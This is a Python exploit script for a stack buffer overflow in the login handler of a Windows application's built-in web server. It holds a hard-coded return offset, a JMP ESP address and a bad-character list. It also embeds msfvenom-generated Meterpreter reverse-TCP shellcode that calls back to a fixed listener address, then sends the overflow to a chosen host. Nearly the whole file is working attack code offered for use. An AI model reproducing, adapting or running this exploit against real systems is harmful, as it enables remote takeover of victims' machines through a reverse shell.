#!/usr/bin/python
# Tested on Windows 10 (x86).
# The target application must have its built-in web server enabled: the
# overflow is delivered as an HTTP POST to /login on that server (TCP port 80
# by default, see --port below).
# Exploit for an older version of the same application:
# https://www.exploit-db.com/exploits/40832/

import socket,os,time,struct,argparse

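# Bytes the encoded payload must not contain (the -b list of the msfvenom
# command in build_shellcode): NUL, LF, CR and the form-encoding
# metacharacters '%', '&', '+', '=' that an application/x-www-form-urlencoded
# parser would decode or treat as field/pair separators.
BAD_CHARS = b"\x00\x0a\x0d\x25\x26\x2b\x3d"

# Distance from the start of the `username` value to the saved return address.
RET_OFFSET = 780
# JMP ESP inside libspp. This is a static, non-rebased address, so it is only
# valid for the exact build the author tested (see file header); re-verify the
# module base / offset before using it against any other build.
JMP_ESP = 0x10090c83
# Every form field is padded with NOPs up to this fixed size.
FIELD_SIZE = 10000


def build_shellcode():
    """Return the stage-0 payload as raw bytes (360 bytes).

    Generated with the command below. LHOST/LPORT are baked into these bytes,
    so a different listener means regenerating the payload and re-checking
    that none of BAD_CHARS reappear:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 \
        LPORT=4455 -b "\\x00\\x0a\\x0d\\x25\\x26\\x2b\\x3d" -f py
    """
    return (
        b"\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
        b"\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
        b"\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
        b"\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
        b"\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
        b"\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
        b"\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
        b"\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
        b"\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
        b"\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
        b"\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
        b"\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
        b"\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
        b"\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
        b"\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
        b"\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
        b"\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
        b"\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
        b"\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
        b"\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
        b"\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
        b"\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
        b"\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
        b"\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
        b"\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
        b"\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
        b"\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
        b"\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"
    )


def build_buffer(ret_addr=JMP_ESP, offset=RET_OFFSET, total=FIELD_SIZE):
    """Return the overflow string placed in each form field.

    Layout: `offset` bytes of filler, the little-endian return address
    (`ret_addr`, a JMP ESP), a 12-byte NOP sled, the shellcode, then NOP
    padding up to `total` bytes. As in the original, `total` smaller than the
    assembled payload simply yields no padding (negative repeat -> b"").
    """
    payload = b"\x41" * offset
    payload += struct.pack("<L", ret_addr)
    # Small sled so ESP landing a few bytes into the buffer still reaches the
    # decoder stub.
    payload += b"\x90" * 12
    payload += build_shellcode()
    payload += b"\x90" * (total - len(payload))
    return payload


def find_bad_chars(data, bad=BAD_CHARS):
    """Return the members of `bad` that occur in `data` (empty list if none)."""
    return [c for c in bad if c in data]


def build_request(host, payload=None):
    """Return the complete HTTP POST (bytes) carrying `payload` in both fields.

    `host` (str) is used for the Host header -- the original hard-coded a lab
    address there that did not match --host. `payload` defaults to
    build_buffer(). Content-Length is kept at the original's 17000 although
    the body actually sent is longer (two FIELD_SIZE values plus the field
    names); NOTE(review): assumed not to matter for triggering the overflow --
    confirm against the target before changing it.
    """
    if payload is None:
        payload = build_buffer()
    headers = [
        b"POST /login HTTP/1.1",
        b"Host: " + host.encode("ascii"),
        b"User-Agent: Mozilla/5.0",
        b"Connection: close",
        b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        b"Accept-Language: en-us,en;q=0.5",
        b"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        b"Keep-Alive: 300",
        b"Proxy-Connection: keep-alive",
        b"Content-Type: application/x-www-form-urlencoded",
        b"Content-Length: 17000",
    ]
    body = b"username=" + payload + b"&password=" + payload + b"\r\n"
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def main(argv=None):
    """Parse the command line, assemble the request and send it to the target.

    Exits via argparse (status 2) if the assembled buffer contains any of
    BAD_CHARS, since the target's form parser would mangle it.
    """
    parser = argparse.ArgumentParser(
        description="Stack overflow in the /login handler of the built-in web server.")
    parser.add_argument('--host', required=True, help="target IP address or hostname")
    parser.add_argument('--port', type=int, default=80,
                        help="target web-server port (default: 80)")
    parser.add_argument('--timeout', type=float, default=10.0,
                        help="socket timeout in seconds (default: 10)")
    args = parser.parse_args(argv)

    payload = build_buffer()
    bad = find_bad_chars(payload)
    if bad:
        parser.error("payload contains bad characters: %r" % (bad,))
    request = build_request(args.host, payload)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Without a timeout an unreachable host or a server that never accepts the
    # connection hangs the script indefinitely.
    sock.settimeout(args.timeout)
    try:
        sock.connect((args.host, args.port))
        print('Sending evil buffer...')
        # sendall(): a bare send() may transmit only part of a ~20 KB request.
        sock.sendall(request)
        print('Payload Sent!')
    finally:
        sock.close()


if __name__ == "__main__":
    main()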